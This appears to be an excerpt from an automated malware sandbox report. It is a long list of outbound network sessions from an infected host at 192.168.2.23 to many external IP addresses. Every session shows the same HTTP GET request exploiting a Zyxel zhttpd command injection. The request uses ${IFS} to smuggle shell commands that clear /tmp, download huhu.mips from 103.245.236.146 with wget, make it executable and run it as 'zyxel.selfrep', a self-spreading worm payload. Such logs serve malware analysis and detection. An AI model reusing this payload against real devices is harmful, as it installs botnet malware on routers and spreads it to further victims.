                                                Jan 29, 2024 07:07:55.491389990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6138192.168.2.2336322107.65.133.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491424084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6139192.168.2.2349714200.252.110.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491478920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6140192.168.2.2354600142.95.178.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491508961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6141192.168.2.2349576115.196.214.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491554022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6142192.168.2.235939051.24.227.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491578102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6143192.168.2.234999887.20.164.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491612911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6144192.168.2.2357612207.176.20.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491641998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6145192.168.2.2353540141.76.210.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491684914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6146192.168.2.2354186195.206.234.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491731882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6147192.168.2.235042094.1.215.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491769075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6148192.168.2.234275282.2.128.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491811037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6149192.168.2.2349732191.39.147.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491832018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6150192.168.2.2335300183.95.82.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491844893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6151192.168.2.233308440.171.118.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491892099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6152192.168.2.2354958135.118.230.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491945982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6153192.168.2.2348408159.204.108.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491945982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6154192.168.2.23607164.157.175.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.491974115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6155192.168.2.235745619.227.188.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492011070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6156192.168.2.2349452196.218.122.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492033005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6157192.168.2.2355140221.36.150.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492058039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6158192.168.2.233289480.119.124.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492101908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6159192.168.2.2359140125.101.137.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492151022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6160192.168.2.2351080154.78.37.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492208958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6161192.168.2.2338788175.209.52.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492211103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6162192.168.2.2351206142.21.233.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492273092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6163192.168.2.2341214202.3.197.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492305040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6164192.168.2.2360580111.39.173.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492357969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6165192.168.2.2347186145.92.82.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492391109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6166192.168.2.2333630162.249.120.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492429972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6167192.168.2.233443236.45.242.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492496014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6168192.168.2.2340212189.6.203.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492532969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6169192.168.2.2338098185.151.226.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492547035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6170192.168.2.234437869.103.199.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492592096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6171192.168.2.234002694.82.206.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492611885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6172192.168.2.2348950142.215.87.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492652893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6173192.168.2.2351692154.123.216.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492679119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6174192.168.2.235872417.189.78.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492722988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6175192.168.2.235079086.234.82.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492748976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6176192.168.2.2336854149.255.144.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492799044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6177192.168.2.235077881.153.86.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492821932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6178192.168.2.2359694216.209.157.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492868900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6179192.168.2.2340966137.226.184.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492913008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6180192.168.2.235330846.54.249.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.492954969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6181192.168.2.233399036.28.16.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493001938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6182192.168.2.233506669.81.207.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493033886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6183192.168.2.2348514150.44.118.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493072033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6184192.168.2.2334168104.31.223.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493129969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6185192.168.2.2333462123.112.109.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493149996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6186192.168.2.2355064119.171.8.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493202925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6187192.168.2.23603408.113.226.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493210077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6188192.168.2.234795651.202.243.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493246078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6189192.168.2.234045080.105.132.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493324995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6190192.168.2.2341760203.79.128.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493380070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6191192.168.2.234556067.82.117.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493393898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192192.168.2.2358234100.51.85.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493432045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6193192.168.2.235556457.183.40.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493480921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6194192.168.2.235002214.50.97.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493514061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6195192.168.2.233844614.104.160.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493557930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6196192.168.2.2340834131.41.117.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493575096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6197192.168.2.2353832198.13.90.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493623972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6198192.168.2.2341304112.202.48.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493664026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6199192.168.2.234499089.17.61.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493685961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6200192.168.2.234997694.66.36.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:55.493702888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6201192.168.2.234452090.209.254.236443
                                                TimestampBytes transferredDirectionData
